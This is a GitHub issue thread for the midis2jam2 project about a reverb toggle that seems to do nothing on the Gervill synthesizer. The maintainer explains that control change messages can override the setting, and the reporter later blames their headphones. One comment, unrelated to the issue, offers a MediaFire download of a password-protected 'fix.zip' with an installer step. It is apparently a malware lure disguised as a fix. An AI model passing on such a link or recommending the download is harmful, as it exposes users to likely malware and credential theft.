### ISSUE TITLE
Reverb toggle doesn't work.

### ISSUE THREAD

**Issue by RukoBlood** [wyskoj/midis2jam2#204]
**Describe the bug**
On gervill synthesiser reverb toggle makes no sense. Even when turned off, reverb still exists

**Offending MIDI file**
Every midi file.

**Expected behavior**
No reverb when reverb turned off.

**Screenshots**
![image](https://github.com/user-attachments/assets/c5f6d66b-ef7d-47f7-99ea-c5b3e52f87c4)
No Reverberation. But still gervill reverb.

**System**
Windows 10 Pro 22H2
i5-3230M, GT 720M, 8GB DDR3

**Additional context**
No additional context.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wyskoj** [comment]
These settings work by sending a control change message to the synthesizer to disable the effects. If a MIDI file also has control change messages sent, they will trump mine and the reverb will be turned back on. So there's not a practical way for me to absolutely guarantee that the effects will be disabled. (The Java Sound API does not expose a nice function like `setReverbEnabled` so the best I can do is send a MIDI message to disable it.)

If disabling reverb is critical to your use case, I suggest installing an external synthesizer like VirtualMIDISynth which has better configuration options available. The primary function of midis2jam2 is not audio synthesis but rather animation.

**Comment by RukoBlood** [comment]
Thanks.

**Comment by RukoBlood** [comment]
UPD: it looks like problem with my headphones. Alright, thanks.

**Comment by RukoBlood** [comment]
![Image](https://github.com/user-attachments/assets/c6388f1d-0dd2-434b-8310-87f2ad4fe540)
Ah, thanks for info.
